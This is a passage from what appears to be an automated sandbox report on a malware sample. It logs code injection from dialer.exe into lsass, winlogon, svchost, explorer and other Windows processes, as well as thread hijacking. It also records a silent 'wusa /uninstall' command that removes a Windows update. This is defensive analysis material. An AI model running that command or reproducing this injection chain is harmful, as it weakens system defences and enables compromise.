        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C257273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8B94273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6691273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 13EF273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D57273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 69B4273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CC74273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5DA7273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 199D273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F389273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3B8273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 40E4273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A653273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 27BC273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7B15273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 621A273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F48273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8B4B273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 683D273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 874273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2E26273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6C5E273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D593273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FC65273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7874273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 33B4273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D0A273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AB4C273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2A64273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6CF3273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6452273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4935273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 60DA273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5E7B273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F7C273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E815273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5234273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9DA9273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 602E273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CF96273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DA54273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 38E0273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 97C273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E9AB273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FB0F273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 23E3273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CB5E273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3D99273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F9E6273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DD84273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DDE2273CJump to behavior
        Injects a PE file into a foreign processes
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAED90000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC670000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0B10000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A661330000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B370000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108B940000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166910000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 8740000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF64520000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 265CF960000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 223DA540000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22638E00000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1EC097C0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1CFE9AB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 250FB0F0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23523E30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1B5CB5E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E53D990000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DAF9E60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E6DD840000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E6DDE20000 value starts with: 4D5AJump to behavior
        Injects code into the Windows Explorer (explorer.exe)
        Source: C:\Windows\System32\dialer.exeMemory written: PID: 2580 base: 8740000 value: 4DJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\user\Desktop\loader.exeThread register set: target process: 6952Jump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeThread register set: target process: 7648Jump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeThread register set: target process: 7712Jump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeThread register set: target process: 7784Jump to behavior
        Writes to foreign memory regions
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAED90000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B3B0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC670000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0B10000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A661330000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDC0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B370000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108B940000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166910000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 8740000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF64520000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 265CF960000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 223DA540000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22638E00000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1EC097C0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1CFE9AB0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 250FB0F0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23523E30000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1B5CB5E0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E53D990000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DAF9E60000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E6DD840000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E6DDE20000Jump to behavior
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\Windows\System32\dialer.exeCode function: 11_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,11_2_0000000140001B54
        Source: C:\Windows\System32\dialer.exeCode function: 11_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,11_2_0000000140001B54
        Source: winlogon.exe, 00000014.00000000.1843622830.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000014.00000002.3146565995.00000225DCB70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: winlogon.exe, 00000014.00000000.1843622830.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000014.00000002.3146565995.00000225DCB70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: winlogon.exe, 00000014.00000000.1843622830.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000014.00000002.3146565995.00000225DCB70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
